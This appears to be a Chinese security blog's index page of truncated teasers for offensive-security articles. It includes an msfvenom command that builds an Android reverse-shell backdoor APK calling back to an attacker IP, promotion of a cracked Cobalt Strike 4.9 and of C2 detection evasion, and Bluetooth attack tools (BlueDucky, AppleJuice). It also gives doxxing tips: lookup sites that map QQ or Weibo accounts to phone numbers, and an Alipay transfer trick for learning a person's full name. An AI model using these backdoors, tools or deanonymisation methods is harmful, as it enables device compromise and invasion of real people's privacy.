环境：攻击方：nethuner（OnePlus 6t) 192.168.1.83目标机：vivo y551、生成后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.83 LPORT=5555 R>1.apk #生成后门程序（1...

前言言归正传，今天我们学习的是一些基本的社工知识。在开始之前提醒一点：该文章只是为了技术交流。第一部分老规矩，我们还是举例子。如果，我们现在有一个人的QQ号，我们应该如何进行社工？或...

 

推荐阅读功能1、sqlmap的常用命令只需要点点点即可（无脑简单）2、支持post数据包，可将抓包软件中抓的包放到post数据进行探测3、常用功能、绕waf、shell模块4、可自定义参数使用视频教程: 下...

视频演示推荐阅读介绍 📢BlueDucky 是利用蓝牙设备漏洞的强大工具。通过运行此脚本，您可以：📡 加载已保存的不再可见但仍启用蓝牙的蓝牙设备。📂 自动保存您扫描的所有设备。💌 通过鸭子脚本格...

免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自...

前言：最近在寻找合适的新的c2工具使用，Cobalt Strike（简称cs）的特征查的太严了不深入的修改特征随便就被威胁情报标红，于是打算使用市面上的一些c2工具看看哪些比较好用。修改cs的特征需要...

靠国光的脚本(https://www.sqlsec.com/2020/04/termuxlinux.html)安装了centos7，但发现无法使用systemctl命令，找到了解决方法：项目地址：https://github.com/gdraheim/docker-systemctl-repl...

如何通过QQ、微博获取用户的手机号http://qb.shegongk.com/https://ziyuanwang.asia/chabang3/如何通过手机号获取全名？通过旧版本的支付宝，转给别人一分钱，在那里点击他的头像，然后慢慢的猜...

前言在本次更新中，我将分享如何扩展可以发送配对消息的 Android nRF Connect 应用程序的信号，在最新的 iOS 17 上演示 AppleJuice，展示哪些特定的广告包可以触发最远 50 米的弹出窗口，甚至使...

前言 4.9 尊享版在原版 Cobalt Strike 4.9 的基础上进行破解、二开和修复 BUG。 OneCS 4.9 移除了原版所有暗桩，增加大量体验优化： 进程浏览染色和进程识别 文件浏览染色 下载页面染色和优化 I...

设备适用人群范围物联网硬件开发工程师网络安全工程师 代码设计师 Linux系统运维安全工程师技术入门的朋友技术辅助工作好帮手手机硬件配置注:手机系统为双系统,可以使用正常手机的功能,也能使用...

介绍： Starkiller是BC Security团队为Empire构建的一款利用VUE图形化界面工具，利用其RESTful API功能完成对Empire使用，方便渗透测试人员的使用。其项目地址为：https://github.com/BC-SECURI...